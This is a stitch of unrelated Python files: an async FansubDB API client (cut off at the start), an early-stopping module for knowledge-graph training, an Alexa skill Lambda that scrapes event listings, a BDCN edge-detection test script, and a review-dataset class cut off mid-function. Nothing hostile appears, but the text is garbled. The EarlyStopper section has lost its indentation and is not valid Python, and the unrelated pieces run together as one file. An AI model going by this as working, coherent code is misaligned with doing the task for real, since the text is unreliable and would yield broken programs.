            raise FSDBAPIError(ret_code, f"Failed to decode JSON response: {str(e)}")
        except aiohttp.ClientResponseError as e:
            self.logger.error(f"Failed to request {url}: {str(e)}")
            raise FSDBAPIError(e.status, f"Failed to request {url}: {str(e)}")
        if isinstance(data, list):
            as_attr_dict = []
            for item in data:
                try:
                    as_attr_dict.append(AttributeDict(item))
                except Exception:
                    as_attr_dict.append(item)
            return as_attr_dict
        try:
            return AttributeDict(data)
        except Exception:
            return data

    async def authorize(self):
        """
        Authorize username and password.
        """
        # FIX: the password value had been replaced by a <PASSWORD> placeholder;
        # restore the stored credential.
        body = {"username": self._user, "password": self._pass}
        self.logger.info(f"Authenticating FansubDB with user {self._user}")
        res = await self.request_api("post", "pintusorga", json=body)
        if res["type"] == "success":
            self.logger.info("Successfully logged in.")
            self._token = res["token"]
        else:
            self.logger.error("Failed to authenticate account, disabling fansubdb...")
            self._token = None

    async def check_expires(self):
        """Re-authorize when the token is missing or about to expire."""
        if self._expire is None:
            return
        # FIX: also retry when a previous authorize() failed and left the
        # token as None (the old check only matched the empty string).
        if not self._token:
            await self.authorize()
            return
        ctime = arrow.utcnow().int_timestamp
        if ctime - 300 >= self._expire:
            self.logger.info("Reauthorizing since token expired...")
            await self.authorize()

    async def find_id_from_mal(self, mal_id: int, dataset: list) -> int:
        """Find a FansubDB anime id by MAL id in a dataset sorted by mal_id.

        Returns 0 when not found.
        """
        mid_num = len(dataset) // 2
        mid_data = dataset[mid_num]
        if mid_data["mal_id"] == mal_id:
            return mid_data["id"]
        # Binary split once, then scan the relevant half.
        if mid_data["mal_id"] > mal_id:
            for data in dataset[:mid_num]:
                if data["mal_id"] == mal_id:
                    return data["id"]
        elif mid_data["mal_id"] < mal_id:
            for data in dataset[mid_num:]:
                if data["mal_id"] == mal_id:
                    return data["id"]
        return 0

    async def find_project_id(self, anime_id: int, dataset: list) -> int:
        """Find a project id by its anime id; returns 0 when not found."""
        dataset.sort(key=lambda x: x["anime"]["id"])
        mid_num = len(dataset) // 2
        mid_data = dataset[mid_num]
        if mid_data["anime"]["id"] == anime_id:
            return mid_data["id"]
        if mid_data["anime"]["id"] > anime_id:
            for data in dataset[:mid_num]:
                if data["anime"]["id"] == anime_id:
                    return data["id"]
        elif mid_data["anime"]["id"] < anime_id:
            for data in dataset[mid_num:]:
                if data["anime"]["id"] == anime_id:
                    return data["id"]
        return 0

    async def fetch_animes(self) -> List[fsdbmodel.FSDBAnimeData]:
        """Fetch the full anime list, sorted by id; empty list on failure."""
        await self.check_expires()
        headers = {"Authorization": f"Bearer {self._token}"}
        try:
            anime_list: List[dict] = await self.request_api("get", "anime/list", headers=headers)
            if isinstance(anime_list, list):
                anime_list.sort(key=lambda x: x["id"])
                return anime_list
            else:
                self.logger.error(f"Failed to get Anime list, {anime_list!r}")
                return []
        except FSDBAPIError as e:
            self.logger.error(f"Failed to fetch anime list: {str(e)}")
            return []

    async def fetch_anime(self, anime_id: Union[int, str]) -> Optional[fsdbmodel.FSDBAnimeData]:
        """Fetch a single anime by FansubDB id; None when missing."""
        await self.check_expires()
        headers = {"Authorization": f"Bearer {self._token}"}
        try:
            anime_info: dict = await self.request_api("get", f"anime/list/{anime_id}", headers=headers)
            if "type" in anime_info and anime_info["type"] == "error":
                return None
            return anime_info
        except FSDBAPIError as e:
            if e.code == 404:
                return None
            raise

    async def fetch_anime_by_mal(self, mal_id: Union[int, str]) -> Optional[fsdbmodel.FSDBAnimeData]:
        """Fetch a single anime by MAL id; None when missing."""
        await self.check_expires()
        headers = {"Authorization": f"Bearer {self._token}"}
        try:
            anime_info = await self.request_api("get", f"anime/mal/{mal_id}", headers=headers)
            if "type" in anime_info and anime_info["type"] == "error":
                return None
            return anime_info
        except FSDBAPIError as err:
            # Error, assume that it got 404'd
            if err.code == 404:
                return None
            raise

    async def import_mal(self, mal_id: int) -> Tuple[bool, Union[int, str]]:
        """Import an anime from MAL; returns (ok, fansubdb_id_or_message)."""
        await self.check_expires()
        headers = {"Authorization": f"Bearer {self._token}"}
        body_json = {"mal_id": mal_id}
        result = await self.request_api("post", "anime/list", json=body_json, headers=headers)
        if result["type"] == "success":
            anime_lists = await self.fetch_animes()
            anime_lists.sort(key=lambda x: x["mal_id"])
            fs_id = await self.find_id_from_mal(mal_id, anime_lists)
            return True, fs_id
        return False, result["message"]

    async def fetch_fansubs(self, search_query: str = "") -> List[fsdbmodel.FSDBFansubData]:
        """Fetch all fansubs, optionally filtered by a name search."""
        await self.check_expires()
        headers = {"Authorization": f"Bearer {self._token}"}
        fansubs_list: list = await self.request_api("get", "fansub/list", headers=headers)
        if search_query.rstrip() != "":
            fansubs_list = self.get_close_matches(search_query, fansubs_list)
        return fansubs_list

    async def fetch_anime_fansubs(
        self, anime_id: Union[int, str]
    ) -> Tuple[List[fsdbmodel.FSDBProjectData], str]:
        """List the fansub projects attached to an anime."""
        if isinstance(anime_id, str):
            try:
                anime_id = int(anime_id)
            except ValueError:
                return [], "Anime ID is not a valid number."
        await self.check_expires()
        headers = {"Authorization": f"Bearer {self._token}"}
        fansubs_list: list = await self.request_api("get", f"projek/anime/{anime_id}", headers=headers)
        return fansubs_list, "Success"

    async def fetch_fansub_projects(
        self, fansub_id: Union[int, str]
    ) -> Tuple[List[fsdbmodel.FSDBProjectData], str]:
        """List the projects belonging to a fansub."""
        if isinstance(fansub_id, str):
            try:
                fansub_id = int(fansub_id)
            except ValueError:
                return [], "Fansub ID is not a valid number."
        await self.check_expires()
        headers = {"Authorization": f"Bearer {self._token}"}
        try:
            project_lists: list = await self.request_api("get", f"projek/fansub/{fansub_id}", headers=headers)
            if (
                isinstance(project_lists, dict)
                and "type" in project_lists
                and project_lists["type"] == "error"
            ):
                return [], project_lists["message"]
            return project_lists, "Success"
        except FSDBAPIError as err:
            if err.code == 404:
                return [], "Fansub ini belum ada garapan"
            return [], err.message

    async def add_new_project(
        self, anime_id: Union[int, str], fansub_id: Union[int, str, list], status: str = "Tentatif"
    ) -> Tuple[bool, Union[int, str]]:
        """Create a project linking an anime to one or more fansubs.

        Returns (ok, project_id_or_message).
        """
        if isinstance(anime_id, str):
            try:
                anime_id = int(anime_id)
            except ValueError:
                return False, "Anime ID is not a valid number."
        if isinstance(fansub_id, str):
            try:
                fansub_id = int(fansub_id)
            except ValueError:
                return False, "Fansub ID is not a valid number."
        if isinstance(fansub_id, list):
            try:
                new_fs_id = []
                for fs_id in fansub_id:
                    # FIX: the original tested isinstance(fansub_id, str) here,
                    # so list elements were never actually converted.
                    if isinstance(fs_id, str):
                        try:
                            fs_id = int(fs_id)
                        except ValueError:
                            return False, "Fansub ID is not a valid number."
                    new_fs_id.append(fs_id)
                fansub_id = new_fs_id
            except ValueError:
                return False, "Fansub ID is not a valid number."
        if status not in ["Tentatif", "Jalan", "Tamat", "Drop"]:
            return False, "Invalid status."
        await self.check_expires()
        headers = {"Authorization": f"Bearer {self._token}"}
        json_body = {
            "anime_id": anime_id,
            "fansub": [fansub_id] if not isinstance(fansub_id, list) else fansub_id,
            "flag": None,
            "type": "TV",
            "subtitle": "Softsub",
            "status": status,
            "url": None,
            "misc": None,
        }
        # FIX: typo "fisrt_fs_id" -> "first_fs_id" (local rename only).
        first_fs_id = fansub_id if not isinstance(fansub_id, list) else fansub_id[0]
        results: dict = await self.request_api("post", "projek/list", json=json_body, headers=headers)
        if results["type"] == "success":
            # The API creates the project asynchronously; poll a few times
            # for the new project id before giving up.
            retry_count = 0
            await asyncio.sleep(0.25)
            while retry_count < 5:
                fansub_project, _ = await self.fetch_fansub_projects(first_fs_id)
                project_id = await self.find_project_id(anime_id, fansub_project)
                if project_id != 0:
                    return True, project_id
                retry_count += 1
                await asyncio.sleep(1)
            return False, "Failed to fetch FansubDB Project ID, please contact N4O or mention him."
        return False, results["message"]

    async def get_project(self, project_id: Union[int, str]) -> Optional[dict]:
        """Fetch a project by id; None when missing or on a bad id.

        FIX: the original mixed return shapes — a ``({}, message)`` tuple for a
        non-numeric id but a bare dict / ``None`` otherwise, which would crash
        ``_internal_update_project`` (truthy tuple has no ``.get``). Now the
        method consistently returns the project dict or ``None``.
        """
        if isinstance(project_id, str):
            try:
                project_id = int(project_id)
            except ValueError:
                return None
        await self.check_expires()
        headers = {"Authorization": f"Bearer {self._token}"}
        try:
            results: dict = await self.request_api("get", f"projek/list/{project_id}", headers=headers)
            if results["type"] == "error":
                return None
            return results
        except FSDBAPIError as err:
            if err.code == 404:
                return None
            raise

    async def _internal_update_project(
        self, project_id: Union[int, str], to_update: str, update_data: Optional[Union[int, str, List[int]]]
    ):
        """Perform the actual PUT for update_project; returns (ok, message)."""
        res = await self.get_project(project_id)
        if not res:
            return False, "Project not found."
        headers = {"Authorization": f"Bearer {self._token}"}
        json_body = {to_update: update_data}
        if to_update == "status":
            # Status changes must carry a URL; keep the existing one if set.
            json_body["url"] = "https://naoti.me/fsdb-landing/"
            if res.get("url") is not None:
                json_body["url"] = res["url"]
        results: dict = await self.request_api(
            "put", f"projek/list/{project_id}", json=json_body, headers=headers
        )
        if results["type"] == "success":
            return True, "Success"
        return False, results["message"]

    async def update_project(
        self,
        project_id: Union[int, str],
        to_update: str,
        update_data: Optional[Union[int, str, List[int]]],
        task_mode=True,
    ) -> Tuple[bool, str]:
        """Update one field of a project, optionally fire-and-forget.

        With ``task_mode`` the update runs as a background task and this
        returns immediately.
        """
        if isinstance(project_id, str):
            try:
                project_id = int(project_id)
            except ValueError:
                return False, "Project ID is not a valid number."
        await self.check_expires()
        if task_mode:
            ctime = arrow.utcnow().int_timestamp
            task_name = f"FSDB-Update-Project-{project_id}_{ctime}"
            self._loop.create_task(
                self._internal_update_project(project_id, to_update, update_data), name=task_name
            )
            return True, "Task created"
        return await self._internal_update_project(project_id, to_update, update_data)

    async def delete_project(self, project_id: Union[int, str]) -> Tuple[bool, str]:
        """Delete a project by id; returns (ok, message)."""
        if isinstance(project_id, str):
            try:
                project_id = int(project_id)
            except ValueError:
                return False, "Project ID is not a valid number."
        await self.check_expires()
        headers = {"Authorization": f"Bearer {self._token}"}
        results: dict = await self.request_api("delete", f"projek/list/{project_id}", headers=headers)
        if results["type"] == "success":
            return True, "Success"
        return False, results["message"]
|
# -*- coding: utf-8 -*-
"""Implementation of early stopping."""
import dataclasses
import logging
from dataclasses import dataclass
from typing import Any, Callable, List, Mapping, Optional, Union
import numpy
from .stopper import Stopper
from ..evaluation import Evaluator
from ..models.base import Model
from ..trackers import ResultTracker
from ..triples import TriplesFactory
from ..utils import fix_dataclass_init_docs
# Public API of this module.
__all__ = [
    'smaller_than_any_buffer_element',
    'larger_than_any_buffer_element',
    'EarlyStopper',
    'StopperCallback',
]

logger = logging.getLogger(__name__)
def smaller_than_any_buffer_element(buffer: numpy.ndarray, result: float, delta: float = 0.) -> bool:
    """Decide if a result is better than at least one buffer element, where smaller is better.

    :param buffer: The last results to compare against (excluding the current result).
    :param result: The current result.
    :param delta: The minimum improvement.
    :return: Whether the result is at least delta better than at least one value in the buffer.
    """
    # Beating the *worst* (largest) buffered value by more than delta suffices.
    return result < buffer.max() - delta
def larger_than_any_buffer_element(buffer: numpy.ndarray, result: float, delta: float = 0.) -> bool:
    """Decide if a result is better than at least one buffer element, where larger is better.

    :param buffer: The last results to compare against (excluding the current result).
    :param result: The current result.
    :param delta: The minimum improvement.
    :return: Whether the result is at least delta better than at least one value in the buffer.
    """
    # Beating the *worst* (smallest) buffered value by more than delta suffices.
    return result > buffer.min() + delta
StopperCallback = Callable[[Stopper, Union[int, float]], None]
@fix_dataclass_init_docs
@dataclass
class EarlyStopper(Stopper):
"""A harness for early stopping."""
#: The model
model: Model = dataclasses.field(repr=False)
#: The evaluator
evaluator: Evaluator
#: The triples to use for evaluation
evaluation_triples_factory: Optional[TriplesFactory]
#: Size of the evaluation batches
evaluation_batch_size: Optional[int] = None
#: Slice size of the evaluation batches
evaluation_slice_size: Optional[int] = None
#: The number of epochs after which the model is evaluated on validation set
frequency: int = 10
#: The number of iterations (one iteration can correspond to various epochs)
#: with no improvement after which training will be stopped.
patience: int = 2
#: The name of the metric to use
metric: str = 'hits_at_k'
#: The minimum improvement between two iterations
delta: float = 0.005
#: The metric results from all evaluations
results: List[float] = dataclasses.field(default_factory=list, repr=False)
#: A ring buffer to store the recent results
buffer: numpy.ndarray = dataclasses.field(init=False)
#: A counter for the ring buffer
number_evaluations: int = 0
#: Whether a larger value is better, or a smaller
larger_is_better: bool = True
#: The criterion. Set in the constructor based on larger_is_better
improvement_criterion: Callable[[numpy.ndarray, float, float], bool] = None
#: The result tracker
result_tracker: Optional[ResultTracker] = None
#: Callbacks when training gets continued
continue_callbacks: List[StopperCallback] = dataclasses.field(default_factory=list, repr=False)
#: Callbacks when training is stopped early
stopped_callbacks: List[StopperCallback] = dataclasses.field(default_factory=list, repr=False)
#: Did the stopper ever decide to stop?
stopped: bool = False
def __post_init__(self):
"""Run after initialization and check the metric is valid."""
# TODO: Fix this
# if all(f.name != self.metric for f in dataclasses.fields(self.evaluator.__class__)):
# raise ValueError(f'Invalid metric name: {self.metric}')
if self.evaluation_triples_factory is None:
raise ValueError('Must specify a validation_triples_factory or a dataset for using early stopping.')
if self.larger_is_better:
self.improvement_criterion = larger_than_any_buffer_element
else:
self.improvement_criterion = smaller_than_any_buffer_element
self.buffer = numpy.empty(shape=(self.patience,))
# Dummy result tracker
if self.result_tracker is None:
self.result_tracker = ResultTracker()
def should_evaluate(self, epoch: int) -> bool:
"""Decide if evaluation should be done based on the current epoch and the internal frequency."""
return 0 == ((epoch - 1) % self.frequency)
@property
def number_results(self) -> int:
"""Count the number of results stored in the early stopper."""
return len(self.results)
def should_stop(self) -> bool:
    """Evaluate on a metric and compare to past evaluations to decide if training should stop.

    Runs the evaluator, logs the flattened metrics to the result tracker, and
    compares the monitored metric against the ring buffer of the last
    ``patience`` results via ``improvement_criterion``. Fires the stopped or
    continue callbacks accordingly and returns True when training should stop.
    """
    # Evaluate
    metric_results = self.evaluator.evaluate(
        model=self.model,
        mapped_triples=self.evaluation_triples_factory.mapped_triples,
        use_tqdm=False,
        batch_size=self.evaluation_batch_size,
        slice_size=self.evaluation_slice_size,
    )
    # After the first evaluation pass the optimal batch and slice size is obtained and saved for re-use
    self.evaluation_batch_size = self.evaluator.batch_size
    self.evaluation_slice_size = self.evaluator.slice_size
    self.result_tracker.log_metrics(
        metrics=metric_results.to_flat_dict(),
        step=self.number_evaluations,
        prefix='validation',
    )
    result = metric_results.get_metric(self.metric)
    # Only check if enough values are already collected
    if self.number_evaluations >= self.patience:
        # Stop if the result did not improve more than delta for patience epochs.
        if not self.improvement_criterion(buffer=self.buffer, result=result, delta=self.delta):
            logger.info(f'Stopping early after {self.number_evaluations} evaluations with {self.metric}={result}')
            for stopped_callback in self.stopped_callbacks:
                stopped_callback(self, result)
            self.stopped = True
            return True
    # Update ring buffer (oldest slot is overwritten)
    self.buffer[self.number_evaluations % self.patience] = result
    self.number_evaluations += 1
    # Append to history
    self.results.append(result)
    for continue_callback in self.continue_callbacks:
        continue_callback(self, result)
    return False
def get_summary_dict(self) -> Mapping[str, Any]:
"""Get a summary dict."""
return dict(
frequency=self.frequency,
patience=self.patience,
delta=self.delta,
metric=self.metric,
larger_is_better=self.larger_is_better,
results=self.results,
stopped=self.stopped,
)
|
<reponame>hisashi-ito/alexa_lambda<filename>python/anime_talk/lambda_function.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# AnimeTalkEvent Skill Lambda Function
#
# 更新履歴:
# 2018.07.14 新規作成
# 2018.07.21 修正依頼があったので修正します
#
import os
import sys
sys.path.append('./')
from scraping import Scraping
import boto3
import datetime
# Spoken phrases (Japanese) used by the skill
WELLCOME_MSG = "アニメトークイベントお知らせスキルへようこそ。\
このスキルではアニメトークイベントをチェックできます。\
予定されているアニメトークイベントを知りたいですか? 知りたい場合は「はい」と言ってください。"
HELP_MSG = "アニメトークイベント情報を知りたい場合は、\
「イベント情報教えて」、本スキルを終了したいときは「終了」と言ってください。"
REPROMPT_MSG = "よく聞こえませんでした。イベント情報を知りたいですか?知りたい場合は「はい」と言ってください'"
BYBY_MSG = "ご利用ありがとうございました。スキルを終了します。"
class BaseSpeech:
    """Base builder for an Alexa skill JSON response.

    Args:
        speech_text: Text for Alexa to speak.
        should_end_session: True ends the skill after this exchange, False keeps it open.
        session_attributes: Per-session persisted data (discarded when the session ends).
    """

    def __init__(self, speech_text, should_end_session, session_attributes=None):
        session_attributes = session_attributes if session_attributes is not None else {}
        # The response payload that is ultimately returned; builder methods
        # mutate this dict in place (no response library is available here).
        self._response = {
            "version": "1.0",
            "sessionAttributes": session_attributes,
            "response": {
                "outputSpeech": {
                    "type": "PlainText",
                    "text": speech_text
                },
                "shouldEndSession": should_end_session
            },
        }
        # Keep the raw inputs for later use (e.g. simple_card's default text).
        self.speech_text = speech_text
        self.should_end_session = should_end_session
        self.session_attributes = session_attributes

    def simple_card(self, title, text=None):
        """Attach a simple card; content defaults to the speech text."""
        self._response['response']['card'] = {
            "type": "Simple",
            "title": title,
            "content": self.speech_text if text is None else text
        }
        return self

    def build(self):
        """Return the final response payload; call this last."""
        return self._response
'''
OnSpeech
一問一解に利用する。
システムは返答をするだけで、ユーザの応答を待たない
'''
class OneSpeech(BaseSpeech):
    """One-shot speech: respond once and end the session without waiting for a reply."""

    def __init__(self, speech_text, session_attributes=None):
        # should_end_session is fixed to True for one-shot responses.
        super().__init__(speech_text, True, session_attributes)
'''
QestionSpeech
発話してユーザの返事を待ちます
'''
class QuestionSpeech(BaseSpeech):
    """Speech that asks a question and keeps the session open for the user's reply."""

    def __init__(self, speech_text, session_attributes=None):
        # Keep the session alive (should_end_session=False) so the user can answer.
        super().__init__(speech_text, False, session_attributes)

    def reprompt(self, text):
        """Add a reprompt, spoken when the user does not answer in time."""
        self._response["response"]["reprompt"] = {
            "outputSpeech": {
                "type": "PlainText",
                "text": text
            }
        }
        return self
# Invoked when the skill is launched (and for the help intent).
def welcome():
    """Build the greeting question played when the skill starts."""
    return QuestionSpeech(WELLCOME_MSG).reprompt(REPROMPT_MSG).build()
# Invoked when the skill is being closed.
def bye():
    """Build the farewell response that ends the session."""
    return OneSpeech(BYBY_MSG).build()
# Fetch event information from the venue schedule pages.
def getInfos():
    """Scrape the configured venue pages and return the extracted event info."""
    # Pages to inspect, keyed by their (Japanese) display name.
    urls = {
        "阿佐ヶ谷ロフト": "http://www.loft-prj.co.jp/schedule/lofta",
        "ロフトプラスワン": "http://www.loft-prj.co.jp/schedule/plusone",
    }
    # Scraping's __call__ performs the extraction over the given URLs.
    return Scraping(urls)()
# Build the spoken summary of the scraped events.
def speak(infos):
    """Turn the {site: [(day, title), ...]} mapping into a one-shot speech response."""
    parts = []
    for site, events in infos.items():
        parts.append(site + "の情報についてお知らせします。")
        for event in events:
            # event[0] is the date string, event[1] the event title.
            parts.append(event[0] + " " + event[1] + " ")
        parts.append(" ")
    parts.append(" 情報は以上となります。ご利用ありがとうございました。")
    return OneSpeech("".join(parts)).build()
# Lambda main entry point
def lambda_handler(event, context):
    """AWS Lambda entry point: validate the caller and dispatch the Alexa request.

    Raises ValueError when the request's application id does not match the
    APP_ID environment variable. Unhandled request/intent types fall through
    and implicitly return None.
    """
    # Get APP_ID from the environment and abort when the request targets another app.
    app_id = os.environ['APP_ID']
    if event['session']['application']['applicationId'] != app_id:
        raise ValueError("Invalid Application ID")
    # Determine the request type.
    request = event["request"]
    request_type = request["type"]
    # A LaunchRequest is sent when the user invokes the skill without any intent,
    # e.g. "Alexa, open hello world". Invoking with a phrase that carries an
    # intent ("Alexa, greet with hello world") arrives as an IntentRequest.
    if request_type == "LaunchRequest":
        return welcome()
    # Some intent was detected.
    elif request_type == "IntentRequest":
        intent_name = request["intent"]["name"]
        if intent_name == 'AMAZON.YesIntent' or intent_name == 'AnimeTalkEventInetnt':
            return speak(getInfos())
        # Amazon built-in help intent, triggered by "help", "what can I do",
        # "tell me how to use this", etc.
        elif intent_name == 'AMAZON.HelpIntent':
            return welcome()
        # Amazon built-in cancel/stop intents, triggered by "cancel",
        # "never mind", "stop", etc.
        elif intent_name == 'AMAZON.CancelIntent' or intent_name == 'AMAZON.StopIntent' or intent_name == 'AMAZON.NoIntent':
            return bye()
if __name__ == '__main__':
    # Ad-hoc local smoke test: fake a YesIntent request and print the response.
    import json
    # lambda_handler reads APP_ID from the environment and compares it against
    # event['session']['application']['applicationId']; the original fake event
    # had neither, so the local run always raised KeyError.
    os.environ.setdefault('APP_ID', 'local-test-app-id')
    request = {
        "type": "IntentRequest",
        "intent": {"name": 'AMAZON.YesIntent'}
    }
    event = {
        "request": request,
        "session": {"application": {"applicationId": os.environ['APP_ID']}},
    }
    res = lambda_handler(event, {})
    print(res)
|
import numpy as np
import torch
import torch.optim as optim
import torch.nn as nn
from torch.autograd import Variable
import time
import re
import os
import sys
import cv2
import bdcn
from datasets.dataset import Data
import argparse
import cfg
from matplotlib import pyplot as plt
from os.path import splitext, join
import logging
import fnmatch
import multiprocessing as mp
def createDataList(inputDir = 'images', outputFileName='data.lst', supportedExtensions = ['png', 'jpg', 'jpeg']):
    '''
    Collect image files (e.g. png, jpg, jpeg) from an input directory, case
    insensitive to the extensions, and write a "<name> <name>" list file into
    that directory.

    inputDir            Input directory that contains images.
    outputFileName      Name of the list file written into inputDir.
    supportedExtensions Only files with supported extensions are included in the final list. Case insensitive.

    Returns a list of image file names.
    Raises ValueError when inputDir or supportedExtensions is unset/empty.
    '''
    if inputDir is None:
        raise ValueError('Input directory must be set.')
    if supportedExtensions is None or len(supportedExtensions) == 0:
        raise ValueError('Supported extensions must be set.')
    res = []
    dirList = os.listdir(inputDir)
    for extension in supportedExtensions:
        # Build a case-insensitive fnmatch pattern, e.g. 'png' -> '*.[pP][nN][gG]'.
        pattern = ''.join('[%s%s]' % (char.lower(), char.upper()) for char in extension)
        res.extend(fnmatch.filter(dirList, '*.%s' % (pattern)))
    # Use a context manager so the list file is closed even if a write fails
    # (the original left the handle open on error).
    with open(join(inputDir, outputFileName), "w") as out:
        for f in res:
            out.write('%s %s\n' % (f, f))
    return res
def sigmoid(x):
    """Numpy logistic function: 1 / (1 + exp(-x)), elementwise for arrays."""
    neg = np.array(-1. * x)
    return 1. / (1. + np.exp(neg))
def forwardAll(model, args):
    """Run the BDCN model over every image listed for the test dataset.

    Writes each fused edge map (scaled to 0..255) into <data_root>/<res_dir>
    and records the per-image inference time in timeRecords.txt there.
    """
    test_root = cfg.config_test[args.dataset]['data_root']
    # An explicit input directory overrides the dataset's configured root.
    if(args.inputDir is not None):
        test_root = args.inputDir
    logging.info('Processing: %s' % test_root)
    test_lst = cfg.config_test[args.dataset]['data_lst']
    imageFileNames = createDataList(test_root, test_lst)
    mean_bgr = np.array(cfg.config_test[args.dataset]['mean_bgr'])
    test_img = Data(test_root, test_lst, mean_bgr=mean_bgr, shuffle=False, crop_padding=0, crop_size=None)
    testloader = torch.utils.data.DataLoader(test_img, batch_size=1, shuffle=False, num_workers=1)
    # nm = np.loadtxt(test_name_lst, dtype=str)
    # print(len(testloader), len(nm))
    # assert len(testloader) == len(nm)
    # save_res = True
    save_dir = join(test_root, args.res_dir)
    if not os.path.exists(save_dir):
        os.mkdir(save_dir)
    if args.cuda:
        model.cuda()
    model.eval()
    # data_iter = iter(testloader)
    # iter_per_epoch = len(testloader)
    start_time = time.time()
    all_t = 0
    timeRecords = open(join(save_dir, 'timeRecords.txt'), "w")
    timeRecords.write('# filename time[ms]\n')
    # NOTE(review): assumes the (non-shuffled) DataLoader preserves the order
    # produced by createDataList, so imageFileNames[i] matches batch i — confirm.
    for i, (data, _) in enumerate(testloader):
        if args.cuda:
            data = data.cuda()
        with torch.no_grad():
            data = Variable(data)#, volatile=True)
            tm = time.time()
            out = model(data)
            # Last model output is the fused prediction; squeeze to an HxW map.
            fuse = torch.sigmoid(out[-1]).cpu().data.numpy()[0, 0, :, :]
        elapsedTime = time.time() - tm
        timeRecords.write('%s %f\n'%(imageFileNames[i], elapsedTime * 1000))
        cv2.imwrite(os.path.join(save_dir, '%s' % imageFileNames[i]), fuse*255)
        all_t += time.time() - tm
    timeRecords.close()
    print(all_t)
    print('Overall Time use: ', time.time() - start_time)
def main():
    """Load the BDCN model and run edge detection over each input directory."""
    # Fixed: the original wrote `for inputDir in inputDir`, making the loop
    # variable shadow the list it iterates; use distinct names.
    input_dirs = ['images']
    args = parse_args()
    os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu
    logging.info('Loading model...')
    model = bdcn.BDCN()
    logging.info('Loading state...')
    model.load_state_dict(torch.load('%s' % (args.model)))
    logging.info('Start image processing...')
    # NOTE(review): this overrides the --inputDir CLI argument and forces CUDA
    # regardless of --cuda — confirm that is intended.
    for input_dir in input_dirs:
        args.inputDir = input_dir
        args.cuda = True
        forwardAll(model, args)
def parse_args():
    """Define and parse the command-line arguments for BDCN testing."""
    parser = argparse.ArgumentParser('test BDCN')
    parser.add_argument('-d', '--dataset', type=str, choices=cfg.config_test.keys(), default='bsds500', help='The dataset to train')
    parser.add_argument('-i', '--inputDir', type=str, default='images/ToScan', help='Input image directory for testing.')
    # NOTE(review): store_true with default=True means --cuda can never be disabled
    # from the CLI (and main() overwrites it anyway) — confirm intent.
    parser.add_argument('-c', '--cuda', action='store_true', help='whether use gpu to train network', default=True)
    parser.add_argument('-g', '--gpu', type=str, default='0', help='the gpu id to train net')
    parser.add_argument('-m', '--model', type=str, default='models/bdcn_pretrained_on_nyudv2_depth.pth', help='the model to test')
    parser.add_argument('--res-dir', type=str, default='bdcn', help='the dir to store result')
    parser.add_argument('-k', type=int, default=2, help='the k-th split set of multicue')
    return parser.parse_args()
if __name__ == '__main__':
    # Timestamped, leveled log output for the whole run.
    logging.basicConfig(format='%(asctime)s %(levelname)s:\t%(message)s', level=logging.INFO)
    main()
|
import torch
import torch.utils.data as data
import random
import math
import os
import logging
from utils import config
import pickle
from tqdm import tqdm
import pprint
import pdb
pp = pprint.PrettyPrinter(indent=1)
import re
import ast
#from utils.nlp import normalize
import time
from collections import defaultdict
from utils.data_reader import load_dataset
torch.manual_seed(0)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
class Dataset(data.Dataset):
    """Custom data.Dataset compatible with data.DataLoader.

    Wraps a pre-loaded dict of reviews/labels/tags and converts words to
    vocabulary ids, tracking out-of-vocabulary (OOV) words for a
    pointer/copy-style extended vocabulary.
    """

    def __init__(self, data, vocab):
        """Store the pre-loaded data dict and the vocabulary."""
        self.vocab = vocab
        self.data = data

    def __getitem__(self, index):
        """Returns one data pair (source and target) as a dict of fields."""
        item = {}
        item["review_text"] = self.data["reviews"][index]
        item["label"] = self.data["labels"][index]
        item["tag_text"] = self.data["tags"][index]
        item["tag_aln_text"] = self.data["tag_aln"][index]
        # Convert the reviews into id sequences plus OOV bookkeeping.
        item["ipt_token"], item["ipt_ext"], item["oovs"], \
        item["ipt_review"], item["review_len"], item['max_len'], item['num'] = self.preprocess((item["review_text"],
                                                                                                item["label"]))
        item["tag"] = self.preprocess(item["tag_text"], tgt=True)
        item["tag_aln"] = item["tag_aln_text"] + [0]  # for eos
        # Target ids using the extended (vocab + per-item OOV) index space.
        item["tag_ext"] = self.target_oovs(item["tag_text"], item["oovs"])
        return item

    def __len__(self):
        # The number of examples equals the number of tag sequences.
        return len(self.data["tags"])

    def target_oovs(self, target, oovs):
        """Map target words to ids, using extended ids for words found in ``oovs``."""
        ids = []
        for w in target:
            if w not in self.vocab.word2index:
                if w in oovs:
                    # Copyable OOV: index past the end of the regular vocabulary.
                    ids.append(len(self.vocab.word2index) + oovs.index(w))
                else:
                    ids.append(config.UNK_idx)
            else:
                ids.append(self.vocab.word2index[w])
        ids.append(config.EOS_idx)
        return ids

    def input_oov(self, sentence, oovs=[]):  # oov for input
        """Map input words to ids, appending unseen words to ``oovs`` (mutated and returned)."""
        ids = []
        for w in sentence:
            if w in self.vocab.word2index:
                i = self.vocab.word2index[w]
                ids.append(i)
            else:
                if w not in oovs:
                    oovs.append(w)
                oov_num = oovs.index(w)
                ids.append(len(self.vocab.word2index) + oov_num)
        return ids, oovs

    def preprocess(self, arr, tgt=False,):
        """Converts words to ids.

        When ``tgt`` is True, ``arr`` is a word list; returns ids + EOS.
        Otherwise ``arr`` is (reviews, labels); returns the flattened token ids,
        extended ids, OOV list, per-review id lists, per-review lengths, the
        max review length (+1 for eos) and the review count.
        """
        if(tgt):
            sequence = [self.vocab.word2index[word] if word in self.vocab.word2index else config.UNK_idx for word in arr] + [config.EOS_idx]
            return sequence
        else:
            reviews, labels = arr
            X_reviews = []  # list of list
            X_tokens = []  # list
            # X_sent_ids = []
            X_exts = []  # list
            X_lengths = []  # list
            max_r_len = max(len(r) for r in reviews) + 1  # 1 for eos
            r_num = len(reviews)
            oovs = []
            for i, sentence in enumerate(reviews):
                # TODO: should an 'EOS' be appended at the end of each sentence?
                X_lengths.append(len(sentence))  # TODO: currently every sentence ends with an eos
                sentence_id = [self.vocab.word2index[word] if word in self.vocab.word2index else config.UNK_idx for word in sentence]
                X_tokens += sentence_id
                # X_sent_ids += [i] * len(sentence_id)
                X_ext, oovs = self.input_oov(sentence, oovs)
                X_exts += X_ext
                X_reviews.append(sentence_id)
            return X_tokens, X_exts, oovs, X_reviews, X_lengths, max_r_len, r_num
def collate_fn(batch_data):
    """Collate a list of Dataset items into padded batch tensors on config.device."""

    def merge(sequences, multiple=""):  # len(sequences) = bsz
        # Pad 1-D id sequences to the batch max length; when `multiple` is set,
        # the ext ids (and, for "three", the alignment ids) are padded alongside.
        if multiple:
            if multiple == "two": seqs, seq_exts = sequences
            else: seqs, seq_exts, seq_aln = sequences
